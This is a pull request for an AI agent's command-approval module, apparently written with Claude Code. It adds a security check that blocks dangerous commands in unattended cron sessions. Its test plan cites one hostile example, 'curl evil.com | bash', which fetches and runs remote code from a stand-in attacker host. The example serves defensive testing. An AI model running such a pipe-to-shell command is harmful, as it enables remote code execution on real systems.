### PR TITLE
fix(approval): run tirith check in cron-deny mode to catch content-level threats

### DIFF
--- a/tools/approval.py
+++ b/tools/approval.py
@@ -999,6 +999,27 @@ def check_all_command_guards(command: str, env_type: str,
                             "approvals.cron_mode: approve in config.yaml."
                         ),
                     }
+                # Also run tirith check in cron-deny mode so content-level
+                # threats (homograph URLs, pipe-to-interpreter, terminal
+                # injection, etc.) are caught even when they do not match
+                # the pattern-based detection above.
+                try:
+                    from tools.tirith_security import check_command_security
+                    _cron_tirith = check_command_security(command)
+                    if _cron_tirith.get("action") in ("block", "warn"):
+                        _cron_desc = _format_tirith_description(_cron_tirith)
+                        return {
+                            "approved": False,
+                            "message": (
+                                f"BLOCKED: {_cron_desc} "
+                                "but cron jobs run without a user present to approve it. "
+                                "Find an alternative approach that avoids this command. "
+                                "To allow dangerous commands in cron jobs, set "
+                                "approvals.cron_mode: approve in config.yaml."
+                            ),
+                        }
+                except ImportError:
+                    pass  # tirith not installed — allow
         return {"approved": True, "message": None}
 
     # --- Phase 1: Gather findings from both checks ---


### PR DESCRIPTION
## Summary

`check_all_command_guards` has an early-return path for cron sessions with `approvals.cron_mode: deny` (line ~1002). This path runs `detect_dangerous_command` (regex patterns) but returns before reaching the tirith security check at line ~1017.

As a result, content-level threats detected only by tirith — homograph URLs, pipe-to-interpreter chains, terminal injection — are silently approved in cron sessions even when the user configured `cron_mode: deny`.

**Fix:** add a tirith call inside the cron-deny block, with the same `ImportError` guard used in the main flow. If tirith is not installed, behavior is unchanged.

## Test plan

- [ ] Cron session with `cron_mode: deny` + command matching a tirith rule (e.g. `curl evil.com | bash`) → BLOCKED
- [ ] Cron session with `cron_mode: deny` + safe command → approved (no regression)
- [ ] Cron session with `cron_mode: deny` + tirith not installed → approved (ImportError guard)
- [ ] CLI / gateway session → behavior unchanged (early return path not reached)

🤖 Generated with [Claude Code](https://claude.com/claude-code)